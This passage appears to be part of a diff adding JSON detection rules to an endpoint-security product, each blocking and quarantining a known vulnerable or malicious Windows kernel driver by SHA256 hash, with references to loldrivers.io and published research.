"2175f4289f3bae19b058e5a4f590c200bede255cd2716dfb054d5e0840f70359", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "662c4686-eb7d-556b-af91-0c2f5709d7ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473213Z", + "creation_date": 
"2026-03-23T11:45:30.473216Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473225Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3975db1127c331ba541fffff0c607a15c45b47aa078e756b402422ef7e81c2c", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66312cbe-6971-5bfe-8601-de8e1c73cb6c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151442Z", + "creation_date": "2026-03-23T11:45:31.151445Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151454Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "423ab4aecd6f5241eb64922e891f09d8e90ee37a92ced8f750be152bf990bdc2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66345812-b972-50c0-a749-7dd872013dd5", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488691Z", + "creation_date": "2026-03-23T11:45:31.488692Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488698Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "301a1c82ed1a6d543be168e5d20a78b108829a0ec790a1bfc3628b80c56664ec", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6634ff5f-e7cb-5723-8b93-8bd8fea5ff9a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.478571Z", + "creation_date": "2026-03-23T11:45:30.478574Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.478583Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8561c82c5ae1ab2a5d9214adc620875d83ed7cb9a01253988f5e5aceffe7a901", + "comment": "Vulnerable Kernel Driver (aka vboxdrv.sys) [https://www.loldrivers.io/drivers/2da3a276-9e38-4ee6-903d-d15f7c355e7c/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "663ea6df-11af-5773-a442-b4c7eecf50b9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607834Z", + "creation_date": "2026-03-23T11:45:29.607836Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607842Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7ddf874304556f8a10942a29b3d387cb5155a7419f87813557fe728cb14806d", + "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66470292-2004-5352-9acd-6f35b66dfd00", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", 
+ "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819260Z", + "creation_date": "2026-03-23T11:45:30.819262Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819268Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2f8b68de1e541093f2d4525a0d02f36d361cd69ee8b1db18e6dd064af3856f4f", + "comment": "Vulnerable Kernel Driver (aka hwdetectng.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "664ab1e1-4b9f-59ac-b95d-89e227568ff0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821329Z", + "creation_date": "2026-03-23T11:45:30.821332Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821340Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c6a5663f20e5cee2c92dee43a0f2868fb0af299f842410f4473dcde7abcb6413", + 
"comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66516eff-f81b-5268-a694-f0a5b681a03a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825136Z", + "creation_date": "2026-03-23T11:45:31.825140Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825148Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f736f6440a3c64238229f013e09bb45973e184a81947b6b9d5d851b7209f653c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6652387b-3163-5cde-95ac-d8c503bf397d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.491419Z", + "creation_date": "2026-03-23T11:45:31.491422Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491430Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f2edfc4d4a23b28f3157025d4a7235bebd649524fa3844805ddf05fbbc8ae6b0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6664b715-325d-5ada-8f9e-fd7c099ec8ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972526Z", + "creation_date": "2026-03-23T11:45:29.972528Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972533Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "263e8f1e20612849aea95272da85773f577fd962a7a6d525b53f43407aa7ad24", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) 
[https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66786378-97dc-56ef-a4bc-c82cb4b4ddf5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142434Z", + "creation_date": "2026-03-23T11:45:31.142436Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142442Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c22f7f12154a4d834f76210372bf9ae79cf9e5bdaa5a9a319274c2d4da73eb12", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66835805-bb8f-5449-b98a-a821491be3b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:31.154093Z", + "creation_date": "2026-03-23T11:45:31.154096Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154101Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c498def339dbf7392a6290a34250a44928ef97cac638651709a2ccf7b7cf9176", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6684899d-c8f7-534e-b7be-4b80a4914527", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832151Z", + "creation_date": "2026-03-23T11:45:30.832153Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832159Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c0a07bf1777e2b8c94226af8b9acdfff7f8719c59262c9fc1bd4805ee40c2b1b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "668cd0d3-d1aa-5c2c-bd04-2912f66ea7b8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146322Z", + "creation_date": "2026-03-23T11:45:32.146324Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146330Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bfcbc010432a89714349bd487555cec1ab5299a70f533a16d326a69e15e0c203", + "comment": "Malicious Kernel Driver (aka driver_bfcbc010.sys) [https://www.loldrivers.io/drivers/dbfcce10-76a3-44a4-a9b8-d7126152a235/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "669024a2-67cd-54e5-b511-d8e03fe8efa5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611252Z", + "creation_date": "2026-03-23T11:45:29.611254Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611260Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "55a69f740a77fc07073c3d077d029dfb2dbe4b673171167e7310bd857eb55982", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66b4d0ed-270e-5798-a395-d7ec926c7de5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.149727Z", + "creation_date": "2026-03-23T11:45:31.149731Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.149739Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "24859bbd60d50a2d8d374aa9becbd98184d542a5c78cef21be027895e663aeba", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66b5801f-5d2c-5de7-a855-9311cae2e699", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620620Z", + "creation_date": "2026-03-23T11:45:29.620622Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620628Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66b653b9-79b7-5d84-ab2f-6080b7316435", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604319Z", + "creation_date": "2026-03-23T11:45:29.604321Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604326Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "9fb474b921371c4679582df8484932b832345693de94e3c4a158638b4d75a19c", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66bc2424-1c5f-5217-b316-f6d66f8b974c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488742Z", + "creation_date": "2026-03-23T11:45:31.488744Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488749Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "069daefa61c2c3cc1a2cc2cef5eff2434b7782ad31a575d0ffdf3f54fd5f54bf", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66c6ae36-66da-5240-9a6c-465c9d04263e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155362Z", + "creation_date": "2026-03-23T11:45:31.155364Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155370Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15f15f3c86a787804c532e1a17473b2397b1456109f7b927b0d0f3ba2f1af95b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66e34cf2-0695-58a8-b160-4c397985c0db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499749Z", + "creation_date": "2026-03-23T11:45:31.499752Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499760Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff7dd4ca5a70cb984d5445d754f3fd252d82acd7aee23bc9539b3f09bad49184", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66e3933c-f20e-56e4-8321-55a62c7ce551", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499802Z", + "creation_date": "2026-03-23T11:45:31.499805Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499813Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "80de49749d304bf445e1f8f0710b1a2e85580e1ab153194819edeb9c790b6c95", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66e658b1-6b53-50cc-a0f1-5c7b68618490", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.610228Z", + "creation_date": "2026-03-23T11:45:29.610230Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610235Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e7ebf97a50828f00d7e70140aff5ece77c1eb728be0d9bfceccbebd14b958271", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "66e8e828-f542-59b6-bbb8-74cef653b951", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.818990Z", + "creation_date": "2026-03-23T11:45:31.818993Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.819001Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b9912bc91b85aba24ac99e16550ed7002a44a8f935276da02ce0a7c8f0ed828e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
